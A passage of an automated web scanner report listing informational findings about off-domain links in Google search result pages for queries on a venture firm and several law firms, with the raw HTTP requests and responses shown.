<div><a href="http://www.hugheshubbard.com/" class=l onmousedown="return clk(this.href,'','','','13','','0CHgQoggwDA')">Hughes Hubbard and Reed</a>
...[SNIP]...
<div><a href="http://www.pbwt.com/" class=l onmousedown="return clk(this.href,'','','','14','','0CHoQoggwDQ')">Patterson, Belknap, Webb & Tyler LLP</a>
...[SNIP]...

19.45. http://www.google.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /search?q=Greycroft+Partners&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=puLppwL3bB196Rud7yQxjUIEbHLGwJ9Rc7Xs5MWyEcqpZSupt4unMhj2JdvVMNmEh4RSk4f0iUu7DARpsHmblQuQ24wqR5fGdUA7EvpCPXUw0wJJOqZPn_sAMK7Ryr9g

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:28:25 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 74073

<!doctype html> <head> <title>Greycroft Partners - Google Search</title> <script>window.google={kEI:"WcTLTfuREomdgQeoo9jwBQ",kEXPI:"17259,23756,24692,24878,24879,27400,28164,28505,29229,29685,2
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Greycroft+Partners&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.greycroftpartners.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CB4QFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:IYPI2DJeKdIJ:www.greycroftpartners.com/+Greycroft+Partners&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CCMQIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.greycroftpartners.com/team/" onmousedown="return clk(this.href,'','','','1','','0CCUQqwMoADAA')">Team</a></div><div class=sld><a class=sla href="http://www.greycroftpartners.com/portfolio/" onmousedown="return clk(this.href,'','','','1','','0CCYQqwMoATAA')">Portfolio</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.greycroftpartners.com/about-us/" onmousedown="return clk(this.href,'','','','1','','0CCcQqwMoAjAA')">About Us</a></div><div class=sld><a class=sla href="http://www.greycroftpartners.com/inquiries/" onmousedown="return clk(this.href,'','','','1','','0CCgQqwMoAzAA')">Inquiries</a>
...[SNIP]...
<h3 class="r"><a href="http://www.greycroftpartners.com/team/" class=l onmousedown="return clk(this.href,'','','','2','','0CCsQFjAB')">Team | <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:EQrpsqXYsLAJ:www.greycroftpartners.com/team/+Greycroft+Partners&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CDAQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.greycroftpartners.com/portfolio/" class=l onmousedown="return clk(this.href,'','','','3','','0CDIQFjAC')">Portfolio | <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Ga248CHgYkcJ:www.greycroftpartners.com/portfolio/+Greycroft+Partners&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CDcQIDAC')">Cached</a>
...[SNIP]...
<span class=tl><a href="http://finance.fortune.cnn.com/2011/05/05/why-marissa-campise-left-greycroft-for-venrock/" class=l onmousedown="return clk(this.href,'','','','4','','0CDoQqQIwAw')">Why Marissa Campise left <em>
...[SNIP]...
<h3 class="r"><a href="http://www.crunchbase.com/financial-organization/greycroft-partners" class=l onmousedown="return clk(this.href,'','','','5','','0CEMQFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:wQy1QCR12cUJ:www.crunchbase.com/financial-organization/greycroft-partners+Greycroft+Partners&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CEoQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Greycroft_Partners" class=l onmousedown="return clk(this.href,'','','','6','','0CEwQFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:dM5kWDxYTXwJ:en.wikipedia.org/wiki/Greycroft_Partners+Greycroft+Partners&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CFEQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://angelsoft.net/venture-fund/greycroft-partners" class=l onmousedown="return clk(this.href,'','','','7','','0CFMQFjAG')">Venture Fund | <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:XtckvHYojcAJ:angelsoft.net/venture-fund/greycroft-partners+Greycroft+Partners&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CFgQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.pehub.com/104508/venrock-hires-marissa-campise-from-greycroft-partners/" class=l onmousedown="return clk(this.href,'','','','8','','0CFkQFjAH')">peHUB .. Venrock Hires Marissa Campise from <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:SIvtMGHuSKUJ:www.pehub.com/104508/venrock-hires-marissa-campise-from-greycroft-partners/+Greycroft+Partners&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CF4QIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://dealbook.nytimes.com/tag/greycroft-partners/" class=l onmousedown="return clk(this.href,'','','','9','','0CF8QFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:0pQsy49O790J:dealbook.nytimes.com/tag/greycroft-partners/+Greycroft+Partners&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CGQQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://boston.citybizlist.com/7/2011/5/5/Venrock-Compromises-Marissa-Campise-from-Greycroft-Partners.aspx" class=l onmousedown="return clk(this.href,'','','','10','','0CGUQFjAJ')">Venrock Compromises Marissa Campise from <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:XDIzLXrrrloJ:boston.citybizlist.com/7/2011/5/5/Venrock-Compromises-Marissa-Campise-from-Greycroft-Partners.aspx+Greycroft+Partners&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CGoQIDAJ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://venturebeat.com/company/greycroft-partners/" class=l onmousedown="return clk(this.href,'','','','11','','0CGsQFjAK')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:nLI5bIapr74J:venturebeat.com/company/greycroft-partners/+Greycroft+Partners&amp;cd=11&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','11','','0CHAQIDAK')">Cached</a>
...[SNIP]...
<div><a href="http://www.firstround.com/" class=l onmousedown="return clk(this.href,'','','','12','','0CHMQoggwCw')">First Round Capital</a>
...[SNIP]...
<div><a href="http://www.grpvc.com/" class=l onmousedown="return clk(this.href,'','','','13','','0CHUQoggwDA')">GRP Partners</a>
...[SNIP]...
<div><a href="http://www.villageventures.com/" class=l onmousedown="return clk(this.href,'','','','14','','0CHcQoggwDQ')">Village Ventures</a>
...[SNIP]...
<div><a href="http://www.dfjgotham.com/" class=l onmousedown="return clk(this.href,'','','','15','','0CHkQoggwDg')">DFJ Gotham Ventures</a>
...[SNIP]...

19.46. http://www.google.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /search?q=Moritt+Hock+Hamroff+%26+Horowitz&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=Kh16oMYjJ3i3M9ZKS5-Uc5ayK3FUI9_l7bNoXIqZCInKPUiI535abnnz71YLg2JxJAatb0xLnt91XRSe8ggj3yrqv3a9JAg-PawaBwsLEw2CfhkOasVNgrLJ9ixYklzJ

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:20:44 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 69948

<!doctype html> <head> <title>Moritt Hock Hamroff &amp; Horowitz - Google Search</title> <script>window.google={kEI:"nNDLTdDQI4jL0QHw1-z6Bg",kEXPI:"17259,23756,24692,24878,24879,27400,28164,285
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Moritt+Hock+Hamroff+%26+Horowitz&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.moritthock.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CBYQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:uHOA1UiydKsJ:www.moritthock.com/+Moritt+Hock+Hamroff+%26+Horowitz&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:uHOA1UiydKsJ:www.moritthock.com/+Moritt+Hock+Hamroff+%26+Horowitz&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','1','','0CBsQIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.moritthock.com/index.php/attorneys/attorney/lee_j._mendelson" class=l onmousedown="return clk(this.href,'','','','2','','0CB0QFjAB')">Lee J. Mendelson | <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:9QN2DVZT1usJ:www.moritthock.com/index.php/attorneys/attorney/lee_j._mendelson+Moritt+Hock+Hamroff+%26+Horowitz&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:9QN2DVZT1usJ:www.moritthock.com/index.php/attorneys/attorney/lee_j._mendelson+Moritt+Hock+Hamroff+%26+Horowitz&cd=2&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','2','','0CCIQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.moritthock.com/index.php/attorneys/attorney/henry_e._klosowski" class=l onmousedown="return clk(this.href,'','','','3','','0CCMQFjAC')">Henry E. Klosowski | <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:s2GPkndCJ-kJ:www.moritthock.com/index.php/attorneys/attorney/henry_e._klosowski+Moritt+Hock+Hamroff+%26+Horowitz&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:s2GPkndCJ-kJ:www.moritthock.com/index.php/attorneys/attorney/henry_e._klosowski+Moritt+Hock+Hamroff+%26+Horowitz&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','3','','0CCgQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.lawyers.com/New-York/Garden-City/Moritt-Hock-Hamroff-and-Horowitz-LLP-417972-f.html" class=l onmousedown="return clk(this.href,'','','','4','','0CCoQFjAD')"><em>
...[SNIP]...
<h3 class="r"><a href="http://www.elfaonline.org/pub/news/indnews/news_report.cfm?id=13246" class=l onmousedown="return clk(this.href,'','','','5','','0CDIQFjAE')">ELFA | <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:M6MmErtfvKUJ:www.elfaonline.org/pub/news/indnews/news_report.cfm%3Fid%3D13246+Moritt+Hock+Hamroff+%26+Horowitz&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:M6MmErtfvKUJ:www.elfaonline.org/pub/news/indnews/news_report.cfm%3Fid%3D13246+Moritt+Hock+Hamroff+%26+Horowitz&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','5','','0CDcQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://amlawdaily.typepad.com/files/dial-a-mattress-creditors-list.pdf" class=l onmousedown="return clk(this.href,'','','','6','','0CDgQFjAF')"><em>
...[SNIP]...
<h3 class="r"><a href="http://www.manta.com/c/mms87sh/moritt-hock-hamroff-horowitz" class=l onmousedown="return clk(this.href,'','','','7','','0CD4QFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Ntr2QOukmNQJ:www.manta.com/c/mms87sh/moritt-hock-hamroff-horowitz+Moritt+Hock+Hamroff+%26+Horowitz&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:Ntr2QOukmNQJ:www.manta.com/c/mms87sh/moritt-hock-hamroff-horowitz+Moritt+Hock+Hamroff+%26+Horowitz&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','7','','0CEMQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.superpages.com/bp/Garden-City-NY/Moritt-Hock-Hamroff-Horowitz-L2063224208.htm" class=l onmousedown="return clk(this.href,'','','','8','','0CEUQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Gy_RLzwBAbUJ:www.superpages.com/bp/Garden-City-NY/Moritt-Hock-Hamroff-Horowitz-L2063224208.htm+Moritt+Hock+Hamroff+%26+Horowitz&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:Gy_RLzwBAbUJ:www.superpages.com/bp/Garden-City-NY/Moritt-Hock-Hamroff-Horowitz-L2063224208.htm+Moritt+Hock+Hamroff+%26+Horowitz&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','8','','0CEoQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://longisland.citysearch.com/profile/7450958/garden_city_ny/moritt_hock_hamroff_horowitz.html" class=l onmousedown="return clk(this.href,'','','','9','','0CEsQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:jmw5bn-l7JoJ:longisland.citysearch.com/profile/7450958/garden_city_ny/moritt_hock_hamroff_horowitz.html+Moritt+Hock+Hamroff+%26+Horowitz&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:jmw5bn-l7JoJ:longisland.citysearch.com/profile/7450958/garden_city_ny/moritt_hock_hamroff_horowitz.html+Moritt+Hock+Hamroff+%26+Horowitz&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','9','','0CFAQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.letipli.com/member_details.asp?member_id=405" class=l onmousedown="return clk(this.href,'','','','10','','0CFEQFjAJ')">Attorney Estate Planning - Henry Klosowski - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:zsvVWB0WlWwJ:www.letipli.com/member_details.asp%3Fmember_id%3D405+Moritt+Hock+Hamroff+%26+Horowitz&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:zsvVWB0WlWwJ:www.letipli.com/member_details.asp%3Fmember_id%3D405+Moritt+Hock+Hamroff+%26+Horowitz&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','10','','0CFYQIDAJ')">Cached</a>
...[SNIP]...

19.47. http://www.google.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /search?q=Axley+Brynelson&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=Kh16oMYjJ3i3M9ZKS5-Uc5ayK3FUI9_l7bNoXIqZCInKPUiI535abnnz71YLg2JxJAatb0xLnt91XRSe8ggj3yrqv3a9JAg-PawaBwsLEw2CfhkOasVNgrLJ9ixYklzJ

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:15:59 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 74320

<!doctype html> <head> <title>Axley Brynelson - Google Search</title> <script>window.google={kEI:"f8_LTbGsApOD0QHVid30Bg",kEXPI:"17259,23756,24692,24878,24879,27400,28164,28505,29229,29685,2979
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Axley+Brynelson&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://axley.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CBYQFjAA')">Madison Wisconsin Law Firm: <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:nI3HDDVQL68J:axley.com/+Axley+Brynelson&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CBsQIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.axley.com/attorneys" onmousedown="return clk(this.href,'','','','1','','0CBwQqwMoADAA')">Attorneys</a></div><div class=sld><a class=sla href="http://www.axley.com/contact" onmousedown="return clk(this.href,'','','','1','','0CB0QqwMoATAA')">Contact Us</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.axley.com/careers" onmousedown="return clk(this.href,'','','','1','','0CB4QqwMoAjAA')">Careers</a></div><div class=sld><a class=sla href="http://www.axley.com/bwfw" onmousedown="return clk(this.href,'','','','1','','0CB8QqwMoAzAA')">By Women For Women</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.axley.com/services" onmousedown="return clk(this.href,'','','','1','','0CCAQqwMoBDAA')">Services</a></div><div class=sld><a class=sla href="http://www.axley.com/personal-injury" onmousedown="return clk(this.href,'','','','1','','0CCEQqwMoBTAA')">Personal Injury</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.axley.com/bicycle-accidents" onmousedown="return clk(this.href,'','','','1','','0CCIQqwMoBjAA')">Bicycle Accident Injury Team</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.axley.com/videos" onmousedown="return clk(this.href,'','','','1','','0CCMQqwMoBzAA')">Videos</a>
...[SNIP]...
<h3 class="r"><a href="http://www.axley.com/attorneys" class=l onmousedown="return clk(this.href,'','','','3','','0CC0QFjAC')">Attorneys: <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:hCMTY3udHEMJ:www.axley.com/attorneys+Axley+Brynelson&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CDIQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.axley.com/contact" class=l onmousedown="return clk(this.href,'','','','4','','0CDQQFjAD')">Contact Us: <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ATKjPjX5ntYJ:www.axley.com/contact+Axley+Brynelson&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CDkQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Axley_Brynelson,_LLP" class=l onmousedown="return clk(this.href,'','','','5','','0CDwQFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:aWGIU1PTABIJ:en.wikipedia.org/wiki/Axley_Brynelson,_LLP+Axley+Brynelson&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CEEQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.lawyers.com/Wisconsin/Madison/Axley-Brynelson,-LLP-1793563-f.html" class=l onmousedown="return clk(this.href,'','','','6','','0CEIQFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:x_s7oVmlWC4J:www.lawyers.com/Wisconsin/Madison/Axley-Brynelson,-LLP-1793563-f.html+Axley+Brynelson&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CEkQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.facebook.com/pages/Axley-Brynelson-LLP/100335213355063" class=l onmousedown="return clk(this.href,'','','','7','','0CEsQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:q3RymXkTLwIJ:www.facebook.com/pages/Axley-Brynelson-LLP/100335213355063+Axley+Brynelson&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CFAQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://twitter.com/AxleyLawFirm" class=l onmousedown="return clk(this.href,'','','','8','','0CFEQFjAH')"><em>
...[SNIP]...
<span style="padding-bottom:1px"><a href="http://twitter.com/AxleyLawFirm" class=l onmousedown="return clk(this.href,'','','','9','','0CFQQigwwCA')" style="border-bottom:0"><img src="http://t1.gstatic.com/images?q=tbn:ANd9GcTsGFm0VxfWYfu7a2wqMbDfTJWfvlUnGUQPvOmWGcz4g6aY9w" alt="" align=middle border=0 height=44 style=";padding:1px 1px;vertical-align:middle" width=44></a>
...[SNIP]...
<div><a style="color:#4272db;text-decoration:none" href="http://twitter.com/AxleyLawFirm" class=l onmousedown="return clk(this.href,'','','','9','','0CFMQoAQwCA')">AxleyLawFirm</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:y2e7CDn4HM0J:twitter.com/AxleyLawFirm+Axley+Brynelson&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CFwQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.wenportal.org/Resources/Oneononeassistance/BusinessAssistanceProgram/AxleyBrynelsonLLP.htm" class=l onmousedown="return clk(this.href,'','','','10','','0CF8QFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:dEN4MAibkhIJ:www.wenportal.org/Resources/Oneononeassistance/BusinessAssistanceProgram/AxleyBrynelsonLLP.htm+Axley+Brynelson&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CGcQIDAJ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.linkedin.com/company/axley-brynelson-llp" class=l onmousedown="return clk(this.href,'','','','11','','0CGgQFjAK')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:5VrC-trogTMJ:www.linkedin.com/company/axley-brynelson-llp+Axley+Brynelson&amp;cd=11&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','11','','0CG0QIDAK')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.yelp.com/biz/axley-brynelson-law-firm-madison" class=l onmousedown="return clk(this.href,'','','','12','','0CG8QFjAL')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:W7Frg8Z3jvMJ:www.yelp.com/biz/axley-brynelson-law-firm-madison+Axley+Brynelson&amp;cd=12&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','12','','0CHcQIDAL')">Cached</a>
...[SNIP]...

19.48. http://www.google.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /search?q=Diserio+Martin+O%27Connor+%26+Castiglioni&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=Kh16oMYjJ3i3M9ZKS5-Uc5ayK3FUI9_l7bNoXIqZCInKPUiI535abnnz71YLg2JxJAatb0xLnt91XRSe8ggj3yrqv3a9JAg-PawaBwsLEw2CfhkOasVNgrLJ9ixYklzJ

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:16:38 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 76008

<!doctype html> <head> <title>Diserio Martin O'Connor &amp; Castiglioni - Google Search</title> <script>window.google={kEI:"ps_LTd3kBqy40QHMpYn7Bg",kEXPI:"17259,23756,24692,24878,24879,27400,28
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Diserio+Martin+O%27Connor+%26+Castiglioni&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.dmoc.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CBYQFjAA')"><em>
...[SNIP]...
